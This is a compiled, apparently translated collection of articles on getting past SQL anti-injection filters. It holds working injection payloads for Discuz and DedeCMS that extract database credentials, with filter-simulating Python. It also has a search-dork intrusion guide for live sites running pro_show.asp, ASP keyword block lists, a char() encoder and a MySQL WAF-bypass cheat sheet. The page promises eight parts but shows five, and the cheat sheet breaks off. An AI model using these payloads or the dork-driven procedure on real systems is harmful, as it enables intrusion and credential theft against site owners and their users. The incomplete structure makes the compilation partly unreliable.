Several ways to bypass generic anti-injection programs (script security)

Author: 大美

This page collects eight pieces (Part 1 to Part 8) on bypassing generic anti-injection programs, contributed by 大美.


Part 1: Several ways to bypass generic anti-injection programs (script security)

0x00 Preface


Mainstream CMS products such as Discuz and DedeCMS ship with built-in anti-injection routines. This article is about how to bypass them.

0x01 Discuz X2.0 anti-injection

Anti-injection principle

A recently disclosed injection vulnerability in a Discuz plugin serves as the example for explaining the bypass in detail.

The vulnerability itself is simple. It lies in the getGoods function at line 29 of /source/plugin/v63shop/config.inc.php:

function getGoods($id){
    // $id is concatenated into the query without escaping or casting: this is the injection point
    $query = DB::query('select * from '.DB::table('v63_goods').' where `id` ='.$id);
    $goods = DB::fetch($query);
    $goods['endtime2'] = date('Y-m-d',$goods['endtime']);
    $goods['price2'] = $goods['price'];
    if($goods['sort'] ==2){
        $goods['endtime2']= date('Y-m-d H:i:s',$goods['endtime']);
        $query = DB::query("select * from ".DB::table('v63_pm')." where gid='$goods[id]' order by id desc ");
        $last = DB::fetch($query);
        if(is_array($last)){
            $goods['price'] = $last['chujia'];
            $goods['uid']  = $last['uid'];
            $goods['username']  = $last['username'];
            $goods['pm'] = $last;
            if(time()+600>$goods['endtime']){
                $goods['endtime'] = $last['time']+600;
                $goods['endtime2']= date('Y-m-d H:i:s',$last['time']+600);
            }
        }
    }
    return $goods;
}

The entry point that reaches it is at lines 6 and 8 of /source/plugin/v63shop/goods.inc.php, as shown in the figure.

A request like the one in the figure triggers the vulnerability.

However, the program ships a built-in _do_query_safe function as anti-injection protection, as shown in the figure.

Tracing the execution of _do_query_safe(), it filters the keywords shown in the figure.

Because our URL contains union select, the request gets filtered out.

Bypass method

A MySQL feature is used to get past the _do_query_safe filter. Submit the following URL:

localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user

/*!50000select*/ is a MySQL version-conditional comment: a server at version 5.0.0 or later executes the text inside it as SQL, whereas anything that treats /* ... */ as an ordinary comment sees nothing. Tracing the bypass step by step: the filter first drops the content between /* and */ and stores the result in $clean, whose value is

select * from pre_v63_goods where `id` =1 and 1=2 union /**/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user

Tracing further, it also removes the /**/ and then runs its filter over $clean, as shown in the figure.

The value of $clean at this point is shown in the figure.

$clean now contains no dangerous string, so the _do_query_safe check is passed and the injection succeeds, as the screenshot shows.

0x02 Discuz X2.5 anti-injection

Anti-injection principle

Discuz X2.5 changed the anti-injection code. /config/config_global.php contains the settings shown in the figure.

$_config['security']['querysafe']['afullnote'] defaults to 0; this setting is the key point.

Tracing why the previous payload now fails (figure):

Inspecting the variables, _do_query_safe($sql) still strips the content between /* and */ and stores the result in $clean, as shown in the figure.

Up to this point the behaviour is identical to Discuz X2.0 and $clean has the same value. The difference comes next, as shown in the figure:

Because $_config['security']['querysafe']['afullnote'] = '0', the /**/ is not replaced with an empty string, and a later check tests whether $clean still contains "/*", as shown in the figure.

So the injection fails.

Bypass method

In MySQL, user variables are introduced with @ and assigned with, for example, set @a='abc'. A variable name may also be quoted with backticks, so @`'` is a legal reference to a user variable whose name is a single quote character. That gives us a way to put a single quote into the statement while keeping the SQL syntactically valid, which is what gets us past the anti-injection check.

The _do_query_safe filter is bypassed with the following request:

localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=@`'` union select @`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user

Tracing the execution (figure):

There is an if statement; the important line is

$clean = preg_replace("/'(.+?)'/s", '', $sql);

It deletes every single-quoted string from $sql. So, with the same idea used to get past dede's IDS, we use

@`'` union select @`'`

The filter treats the two single quotes as the delimiters of a string literal and removes everything between them, union select included; MySQL, on the other hand, sees two backtick-quoted user variable names and parses the union select normally. Tracing the subsequent filtering confirms this (figure).

This gets past the _do_query_safe check and the injection succeeds, as shown in the figure.

Discuz later published a patch, but it does not fix the root cause. The official fix is shown in the figure.

It adds a check that rejects strings containing @, but the underlying problem remains: the if statement above still replaces whatever lies between single quotes (quotes included) with nothing. The code:

if (strpos($sql, '/') === false && strpos($sql, '#') === false && strpos($sql, '-- ') === false) {
    $clean = preg_replace("/'(.+?)'/s", '', $sql);
}

With a small transformation the @ characters disappear from $clean as well, which bypasses the patch:

localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`

A leading `'` hides the first @: its quote pairs with the first quote of @`''`, so the first @ lies inside a removed span, and the remaining quote of @`''` pairs with the quote of the trailing @`'`, removing the second @. Tracing the code (figure):

$clean becomes

select * from pre_v63_goods where `id` =``

The patch is bypassed, as shown in the figure.

The price is that union select can no longer be used to read data; it has to be extracted through an error message instead (the count(*)/rand(0)/group by duplicate-key error in the payload above).
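To make the three filter generations described in 0x01 and 0x02 concrete (X2.0 comment stripping, X2.5 with afullnote=0, and the official patch), here is an added Python model of _do_query_safe written for this page; it is not Discuz's own code. The dangerous-keyword list is an assumption (the page only establishes that "union select" is rejected), as is the position of the quote-stripping step relative to the comment handling; the three queries are exactly the ones from these two sections, embedded the way getGoods() embeds gid.

```python
import re

# ASSUMPTION: the real Discuz keyword list is not reproduced on the page;
# only "union select" is known to be on it.
DANGEROUS = ("union select", "load_file", "into outfile", "sleep(", "benchmark(")

# MySQL comment bodies, including /*!50000...*/ version-conditional ones.
COMMENT_BODY = re.compile(r"/\*.*?\*/", re.S)


def has_dangerous(clean):
    low = clean.lower()
    return any(word in low for word in DANGEROUS)


def query_safe_x20(sql):
    """Discuz X2.0 model: drop comment bodies, drop the empty /**/ markers,
    then search what is left for dangerous substrings."""
    clean = COMMENT_BODY.sub("/**/", sql)
    clean = clean.replace("/**/", "")
    return not has_dangerous(clean), clean


def query_safe_x25(sql, afullnote=0, patched=False):
    """Discuz X2.5 model; patched=True adds the official '@' check."""
    clean = sql
    # The quoted-literal stripping only runs when the query carries no
    # comment-like character (the if-condition quoted in the text).
    if "/" not in sql and "#" not in sql and "-- " not in sql:
        clean = re.sub(r"'(.+?)'", "", sql, flags=re.S)
    if patched and "@" in clean:
        return False, clean            # patch: user variables are rejected
    clean = COMMENT_BODY.sub("/**/", clean)
    if afullnote:
        clean = clean.replace("/**/", "")
    elif "/*" in clean:
        return False, clean            # afullnote=0: a surviving comment marker fails
    return not has_dangerous(clean), clean


PREFIX = "select * from pre_v63_goods where `id` ="
# The three gid values from this section, as getGoods() concatenates them.
SQL_X20 = PREFIX + ("1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,"
                    "concat(user,0x23,password),8,9,10,11,12,13 from mysql.user")
SQL_X25 = PREFIX + ("@`'` union select @`'`,2,3,4,5,6,7,"
                    "concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user")
SQL_PATCH = PREFIX + ("`'` or @`''` union select 1 from (select count(*),"
                      "concat((select database()),floor(rand(0)*2))a "
                      "from information_schema.tables group by a)b where @`'`")


def run_all():
    """Which filter generation each payload gets past (True = not blocked)."""
    return {
        "x20 payload vs X2.0": query_safe_x20(SQL_X20)[0],
        "x20 payload vs X2.5": query_safe_x25(SQL_X20)[0],
        "x25 payload vs X2.5": query_safe_x25(SQL_X25)[0],
        "x25 payload vs patch": query_safe_x25(SQL_X25, patched=True)[0],
        "patch payload vs patch": query_safe_x25(SQL_PATCH, patched=True)[0],
    }


if __name__ == "__main__":
    for name, passed in run_all().items():
        print(f"{name}: {'passes' if passed else 'blocked'}")
    print(query_safe_x25(SQL_PATCH, patched=True)[1])
```

The common defect in all three generations is that the filter normalises the statement differently from the way MySQL tokenises it; every bypass on this page exploits that gap rather than a weakness in the keyword list.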

0x03 DedeCMS anti-injection

Anti-injection principle

Here the recently discussed dedeCMS feedback.php injection vulnerability serves as the example for bypassing its anti-injection system; the vulnerability itself needs a short introduction first.

It lies at line 244 of /plus/feedback.php:

if($comtype == 'comments')
{
    $arctitle = addslashes($title);
    $typeid = intval($typeid);
    $ischeck = intval($ischeck);
    $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);
    if($msg!='')
    {
        $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)
              VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
        $rs = $dsql->ExecuteNoneQuery($inquery);
        if(!$rs)
        {
            ShowMsg(' Failed to post the comment! ', '-1');
            //echo $dsql->GetError();
            exit();
        }
    }
}
// quoted reply
elseif ($comtype == 'reply')
{
    $row = $dsql->GetOne("SELECT * FROM `#@__feedback` WHERE id ='$fid'");
    $arctitle = $row['arctitle'];
    $aid =$row['aid'];
    $msg = $quotemsg.$msg;
    $msg = HtmlReplace($msg, 2);
    $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
            VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    $dsql->ExecuteNoneQuery($inquery);
}

$title is never initialized, so it is attacker-controlled, and through it so is $arctitle. Tracing shows $arctitle is placed straight into the SQL statement. It is escaped by addslashes, but the backslashes only protect that one statement: once the INSERT has run, the row stored in the database holds the original single quotes again. Following the code further, at line 268:

$row = $dsql->GetOne("SELECT * FROM `#@__feedback` WHERE id ='$fid'");
$arctitle = $row['arctitle'];

This reads the very #@__feedback table the INSERT above wrote to, and puts the arctitle column back into $arctitle. At line 273 everything becomes clear:

$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
        VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";

$arctitle goes into this SQL statement with no processing at all. Because we control $title, and because the value addslashes escaped is stored unescaped and then reused, this is a second-order (stored) injection.

How to exploit it? Tracing the code shows dede never prints anything during this whole flow, so error-based extraction is impossible. Further analysis shows, however, that the msg column of #@__feedback is displayed. Since $arctitle is controllable, we build a statement that writes the result of the query we want executed into the msg column, and the output appears there.

Bypass method

As is well known, dedeCMS ships a CheckSql() function as its anti-injection layer. It is a generic anti-injection IDS developed by 80sec, and every SQL statement passes through it before execution. Its code:

function CheckSql($db_string,$querytype='select')
{
    global $cfg_cookie_encode;
    $clean = '';
    $error='';
    $old_pos = 0;
    $pos = -1;
    $log_file = DEDEINC.'/../data/'.md5($cfg_cookie_encode).'_safe.txt';
    $userIP = GetIP();
    $getUrl = GetCurUrl();
    // For ordinary SELECT queries, reject some syntax outright
    if($querytype=='select')
    {
        $notallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";
        //$notallow2 = "--|/\*";
        if(preg_match("/".$notallow1."/i", $db_string))
        {
            fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||SelectBreak\r\n");
            exit("Safe Alert: Request Error step 1 !");
        }
    }
    // Full SQL check: mask every single-quoted literal as $s$
    while (TRUE)
    {
        $pos = strpos($db_string, '\'', $pos + 1);
        if ($pos === FALSE)
        {
            break;
        }
        $clean .= substr($db_string, $old_pos, $pos - $old_pos);
        while (TRUE)
        {
            $pos1 = strpos($db_string, '\'', $pos + 1);
            $pos2 = strpos($db_string, '\\', $pos + 1);
            if ($pos1 === FALSE)
            {
                break;
            }
            elseif ($pos2 == FALSE || $pos2 > $pos1)
            {
                $pos = $pos1;
                break;
            }
            $pos = $pos2 + 1;
        }
        $clean .= '$s$';
        $old_pos = $pos + 1;
    }
    $clean .= substr($db_string, $old_pos);
    $clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));
    // Old MySQL versions do not support union and normal code rarely uses it, but attackers do, so check for it
    if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)
    {
        $fail = TRUE;
        $error="union detect";
    }
    // Released code rarely contains -- or # comments, but attackers use them all the time
    elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE)
    {
        $fail = TRUE;
        $error="comment detect";
    }
    // These functions are never needed by the application, but attackers use them to read files or bring the database down
    elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)
    {
        $fail = TRUE;
        $error="slown down detect";
    }
    elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s', $clean) != 0)
    {
        $fail = TRUE;
        $error="slown down detect";
    }
    elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~s', $clean) != 0)
    {
        $fail = TRUE;
        $error="file fun detect";
    }
    elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~s', $clean) != 0)
    {
        $fail = TRUE;
        $error="file fun detect";
    }
    // Old MySQL versions do not support subqueries and the application barely uses them, but attackers use them to read sensitive data
    elseif (preg_match('~\([^)]*?select~s', $clean) != 0)
    {
        $fail = TRUE;
        $error="sub select detect";
    }
    if (!empty($fail))
    {
        fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||$error\r\n");
        exit("Safe Alert: Request Error step 2!");
    }
    else
    {
        return $db_string;
    }
}

Tracing this code reveals its defining behaviour: everything between two single quotes is replaced by $s$, so 'select' becomes $s$. If the sensit﻿ive words are enclosed between two @`'` tokens, $clean never contains them and the CheckSql() check is bypassed.

So title is set to the value below. It passes the IDS check and uses # to comment out the rest of the statement, but one more transformation is needed: char(@`'`). All columns of #@__feedback are declared NOT NULL, and @`'` is a user variable that is NULL by default, so inserting @`'` directly fails; char(@`'`) converts it (CHAR() skips NULL arguments and yields an empty string).

',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,

Tracing the code (figure):

The SQL statement

INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('1','1','游客','\',char(@`\'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,','127.0.0.1','1','1364401789', '0','0','0','feedback','1','genxor');

is masked to

insert into `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) values ($s$,$s$,$s$,$s$,$s$,$s$,$s$, $s$,$s$,$s$,$s$,$s$,$s$);

The masked string contains no sensitive word, so the CheckSql() check is passed.

POST the following request to feedback.php:

action=send&comtype=comments&aid=1&isconfirm=yes&feedbacktype=feedback&face=1&msg=genxor&notuser=1&typeid=1&title=',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,

Tracing the code, the SQL statement actually executed is shown in the variable trace (figure).

The content stored in the database (figure):

Now POST the following to feedback.php:

action=send&comtype=reply&aid=1&isconfirm=yes&feedbacktype=feedback&fid=50

Tracing the SQL statement executed here (figure):

select user() was executed, and its result is stored in the msg column, which is displayed.
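The masking loop is the whole story of this bypass, so here is an added Python port of CheckSql() written for this page (not DedeCMS's code) that runs the two INSERT statements of the attack through it: the first-order INSERT from the comments branch, built with the addslashes-escaped title, and the second-order INSERT from the reply branch, built with the raw title read back from the table. The fixed column values (aid 1, username 游客, ip 127.0.0.1, and so on) are copied from the statement shown above; the dedicated addslashes() helper only handles the characters that occur here.

```python
import re

# CheckSql() step 1: raw-string regex applied to SELECT queries only.
STEP1_RE = re.compile(
    r"[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}", re.I)

# CheckSql() step 2 checks that follow the union/comment tests, in the original elseif order.
STEP2_CHECKS = (
    ("slown down detect", r"(^|[^a-z])sleep($|[^\[a-z])"),
    ("slown down detect", r"(^|[^a-z])benchmark($|[^\[a-z])"),
    ("file fun detect",   r"(^|[^a-z])load_file($|[^\[a-z])"),
    ("file fun detect",   r"(^|[^a-z])into\s+outfile($|[^\[a-z])"),
    ("sub select detect", r"\([^)]*?select"),
)


def mask_quoted(db_string):
    """Port of the scanning loop in CheckSql(): each single-quoted literal,
    with backslash escapes honoured, becomes the token $s$; whitespace is
    collapsed and the result lower-cased, exactly as $clean is built."""
    clean, old_pos, pos = [], 0, -1
    while True:
        pos = db_string.find("'", pos + 1)           # opening quote
        if pos == -1:
            break
        clean.append(db_string[old_pos:pos])
        while True:
            pos1 = db_string.find("'", pos + 1)      # candidate closing quote
            pos2 = db_string.find("\\", pos + 1)     # next backslash
            if pos1 == -1:
                break
            if pos2 == -1 or pos2 > pos1:
                pos = pos1                           # unescaped quote closes the literal
                break
            pos = pos2 + 1                           # skip the escaped character
        clean.append("$s$")
        old_pos = pos + 1
    clean.append(db_string[old_pos:])
    return re.sub(r"\s+", " ", "".join(clean)).strip().lower()


def check_sql(db_string, querytype="select"):
    """Returns (allowed, reason); reason is the string CheckSql() would log."""
    if querytype == "select" and STEP1_RE.search(db_string):
        return False, "SelectBreak"
    clean = mask_quoted(db_string)
    if re.search(r"(^|[^a-z])union($|[^\[a-z])", clean, re.S):
        return False, "union detect"
    # strpos($clean,'/*') > 2 in the original: a comment in the first three bytes is not caught
    if clean.find("/*") > 2 or "--" in clean or "#" in clean:
        return False, "comment detect"
    for reason, pattern in STEP2_CHECKS:
        if re.search(pattern, clean, re.S):
            return False, reason
    return True, ""


def addslashes(s):
    """PHP addslashes() for the characters that matter here."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


COLS = ("`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, "
        "`mid`,`bad`,`good`,`ftype`,`face`,`msg`")
TITLE = "',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,"   # the title value from the text


def feedback_insert(arctitle):
    """The INSERT feedback.php builds; everything except arctitle is fixed here."""
    return ("INSERT INTO `dede_feedback`(" + COLS + ") VALUES ('1','1','游客','" + arctitle +
            "','127.0.0.1','1','1364401789', '0','0','0','feedback','1','genxor');")


FIRST_ORDER = feedback_insert(addslashes(TITLE))   # comments branch: escaped on the way in
SECOND_ORDER = feedback_insert(TITLE)              # reply branch: raw value read back from the table

if __name__ == "__main__":
    print(mask_quoted(FIRST_ORDER))
    print(check_sql(FIRST_ORDER, "insert"), check_sql(SECOND_ORDER, "insert"))
    print(check_sql("select * from t where id=1 union select 1"))
```

Both INSERTs are allowed: in the second-order statement the quote inside @`'` opens a "literal" that, as far as the masking loop is concerned, swallows the (SELECT user()) and the # comment, while MySQL sees a backtick-quoted variable name and executes the subquery as the msg value.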

0x04 Summary

Before writing this article I analysed the source of many widely used CMS systems, including discuz, dedecms, phpwind and phpcms. Only discuz and dedecms use a generic anti-injection layer, but between them they already cover a very large user base. Once an injection vulnerability has been found in the program itself, these bypass methods are well worth having.

Part 2: A manual intrusion through a 枫叶 anti-injection program vulnerability (script security)

The program uses 枫叶通用防注入 1.0 (ASP edition). Its pro_show.asp is vulnerable to cookie injection (or a variant of it). Many sites still have not fixed this, and some only added a simple anti-injection filter (which reportedly can be bypassed).

Baidu dork: inurl:pro_show.asp?showid=

Before injecting, determine the column count: www.xxx.com/pro_show.asp?showid=17 order by 28

Injection statement: www.xxx.com/pro_show.asp?showid=17 and 1=1 union select 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from lei_admin

Work out the column count yourself; the two sites I tried both had 28. Passwords are sometimes plaintext and sometimes MD5; find the admin panel yourself.

Admin upload page: admin/inc/upfile.htm, which allows uploading asp files directly.

Part 3: Some working code and methods for keeping injection out of a website (script security)

Code 1:

<%
'-------- Definitions ------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr

' Strings to filter, separated by "防"
Fy_In = "'防;防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防-防_"
Fy_Inf = split(Fy_In,"防")

'-------- POST parameters ---------------
If Request.Form <> "" Then
    For Each Fy_Post In Request.Form
        For Fy_Xh=0 To Ubound(Fy_Inf)
            ' Plain substring match: "and" inside "brand" triggers it too
            If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh)) <> 0 Then
                Response.Write "Illegal operation! The site has logged the following:<br>"
                Response.Write "IP: "&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "Time: "&Now&"<br>"
                Response.Write "Page: "&Request.ServerVariables("URL")&"<br>"
                Response.Write "Method: POST<br>"
                Response.Write "Parameter: "&Fy_Post&"<br>"
                Response.Write "Data: "&Request.Form(Fy_Post)
                Response.End
            End If
        Next
    Next
End If

'-------- GET parameters ----------------
If Request.QueryString <> "" Then
    For Each Fy_Get In Request.QueryString
        For Fy_Xh=0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh)) <> 0 Then
                Response.Write "Illegal operation! The site has logged the following:<br>"
                Response.Write "IP: "&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "Time: "&Now&"<br>"
                Response.Write "Page: "&Request.ServerVariables("URL")&"<br>"
                Response.Write "Method: GET<br>"
                Response.Write "Parameter: "&Fy_Get&"<br>"
                Response.Write "Data: "&Request.QueryString(Fy_Get)
                Response.End
            End If
        Next
    Next
End If
%>

Filtering illegal strings out of the URL

Try these two methods:

Method 1:

' Works on the raw, still percent-encoded query string and on the Host header
squery=lcase(Request.ServerVariables("QUERY_STRING"))
sURL=lcase(Request.ServerVariables("HTTP_HOST"))

' "%" and "+" are on the list, so any percent- or plus-encoded value is rejected as well
SQL_injdata =":|;|>|<|--|sp_|xp_|\|dir|cmd|^|(|)|+|$|'|copy|format|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
SQL_inj = split(SQL_Injdata,"|")

For SQL_Data=0 To Ubound(SQL_inj)
    if instr(squery&sURL,Sql_Inj(Sql_DATA))>0 Then
        Response.Write "SQL Generic Anti-Injection System"
        Response.end
    end if
next

Method 2:

SQL_injdata =":|;|>|<|--|sp_|xp_|\|dir|cmd|^|(|)|+|$|'|copy|format|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
SQL_inj = split(SQL_Injdata,"|")

' Note: the decoded values are not lower-cased here, so upper-case keywords get through
If Request.QueryString <> "" Then
    For Each SQL_Get In Request.QueryString
        For SQL_Data=0 To Ubound(SQL_inj)
            if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
                Response.Write "SQL Generic Anti-Injection System"
                Response.end
            end if
        next
    Next
End If

If Request.Form <> "" Then
    For Each Sql_Post In Request.Form
        For SQL_Data=0 To Ubound(SQL_inj)
            if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
                Response.Write "SQL Generic Anti-Injection System"
                Response.end
            end if
        next
    next
end if

Method 3

<%
'-------- Definitions ------------------
Dim Str_Post,Str_Get,Str_In,Str_Inf,Str_Xh,Str_db,Str_dbstr

' Strings to filter, separated by "■"
Str_In = "'■;■and■exec■insert■select■delete■update■count■*■%■chr■mid■master■truncate■char■declare"
'----------------------------------
%>

<%
Str_Inf = split(Str_In,"■")

'-------- POST part ---------------
If Request.Form <> "" Then
    For Each Str_Post In Request.Form
        For Str_Xh=0 To Ubound(Str_Inf)
            If Instr(LCase(Request.Form(Str_Post)),Str_Inf(Str_Xh)) <> 0 Then
                '-------- Write to the database ---- start -----
                Str_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
                Set Str_db=Server.CreateObject("ADODB.CONNECTION")
                Str_db.open Str_dbstr
                ' The logged value has its single quotes doubled; the parameter name and URL are inserted as-is
                Str_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Str_Post&"','"&replace(Request.Form(Str_Post),"'","''")&"')")
                Str_db.close
                Set Str_db = Nothing
                '-------- Write to the database ---- end -------
                Response.Write "Illegal operation! The system has logged the following:<br>"
                Response.Write "IP: "&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "Time: "&Now&"<br>"
                Response.Write "Page: "&Request.ServerVariables("URL")&"<br>"
                Response.Write "Method: POST<br>"
                Response.Write "Parameter: "&Str_Post&"<br>"
                Response.Write "Data: "&Request.Form(Str_Post)
                Response.End
            End If
        Next
    Next
End If
'----------------------------------

'-------- GET part ----------------
If Request.QueryString <> "" Then
    For Each Str_Get In Request.QueryString
        For Str_Xh=0 To Ubound(Str_Inf)
            If Instr(LCase(Request.QueryString(Str_Get)),Str_Inf(Str_Xh)) <> 0 Then
                '-------- Write to the database ---- start -----
                Str_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
                Set Str_db=Server.CreateObject("ADODB.CONNECTION")
                Str_db.open Str_dbstr
                Str_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Str_Get&"','"&replace(Request.QueryString(Str_Get),"'","''")&"')")
                Str_db.close
                Set Str_db = Nothing
                '-------- Write to the database ---- end -------
                Response.Write "Illegal operation! The system has logged the following:<br>"
                Response.Write "IP: "&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "Time: "&Now&"<br>"
                Response.Write "Page: "&Request.ServerVariables("URL")&"<br>"
                Response.Write "Method: GET<br>"
                Response.Write "Parameter: "&Str_Get&"<br>"
                Response.Write "Data: "&Request.QueryString(Str_Get)
                Response.End
            End If
        Next
    Next
End If
%>

Part 4: A char() string encoder for getting past anti-injection systems (script security)

Author: Limit

VBS_Code:

Main

' Turns "ab" into char(97)+char(98)
Function char(a)
    Dim strr
    For i = 1 To Len(a)
        strr = strr & ")+char(" & Asc(Mid(a, i, 1))
    Next
    strr = strr & ")"
    strr = Mid(strr, 3)      ' drop the leading ")+"
    char = strr
End Function

Sub Main()
    Dim Temp
    Temp = char(inputbox("Enter the string", "Limit"))
    Temp = inputbox("Encoded:", "Limit", temp)
End Sub

The output uses + for string concatenation, which is SQL Server syntax; MySQL takes the codes as one call, char(97,98), or needs concat().

Part 5: WAF bypass: MySQL injection WAF bypass tricks (script security)

This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More detailed explanation can be found in the slides or in the talk (video should come online in a few weeks).

Basic filter

Comments

' or 1=1#

' or 1=1-- -

' or 1=1/* (MySQL < 5.1)

' or 1=1;%00

' or 1=1 union select 1,2 as `

' or#newline

1='1

' or-- -newline

1='1

' /*!50000or*/1='1

' /*!or*/1='1

Prefixes

+ - ~ !

' or --+2=- -!!!'2

Operators

^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, <=, >=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces

%20 %09 %0a %0b %0c %0d %a0 /**/

'or+(1)sounds/**/like"1"--%a0-

'union(select(1),table_name,(3)from`information_schema`.`tables`)#

Strings with quotes

SELECT 'a'

SELECT "a"

SELECT n'a'

SELECT b'1100001'

SELECT _binary'1100001'

SELECT x'61'

Strings without quotes

'abc' = 0x616263

Aliases

select pass as alias from users

select pass aliasalias from users

select pass`alias alias`from users

Typecasting

' or true = '1 # or 1=1

' or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1

' or '1 # or true

Compare operator typecasting

select * from users where 'a'='b'='c'

select * from users where ('a'='b')='c'

select * from users where (false)='c'

select * from users where (0)='c'

select * from users where (0)=0

select * from users where true

select * from users

Authentication bypass '='

select * from users where name = ''=''

select * from users where false = ''

select * from users where 0 = 0

select * from users where true

select * from users

Authentication bypass '-'

select * from users where name = ''-''

select * from users where name = 0-0

select * from users where 0 = 0

select * from users where true

select * from users

Function filter

General function filtering

ascii (97)

load_file/*foo*/(0x616263)

Strings with functions

'abc' = unhex(616263)

'abc' = char(97,98,99)

hex('a') = 61

ascii('a') = 97

ord('a') = 97

'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings extracted from gadgets

collation(\N) // binary

collation(user()) // utf8_general_ci

@@time_format // %H:%i:%s

@@binlog_format // MIXED

@@version_comment // MySQL Community Server (GPL)

dayname(from_days(401)) // Monday

dayname(from_days(403)) // Wednesday

monthname(from_days(690)) // November

monthname(from_unixtime(1)) // January

collation(convert((1)using/**/koi8r)) // koi8r_general_ci

(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets

aes_encrypt(1,12) // 4çh±{?"^c×HéÉEa

des_encrypt(1,2) // ‚GÒ/ïÖk

@@ft_boolean_syntax // + -><()~*:""&|

@@date_format // %Y-%m-%d

@@innodb_log_group_home_dir // .\

Integer representations

false: 0

true: 1

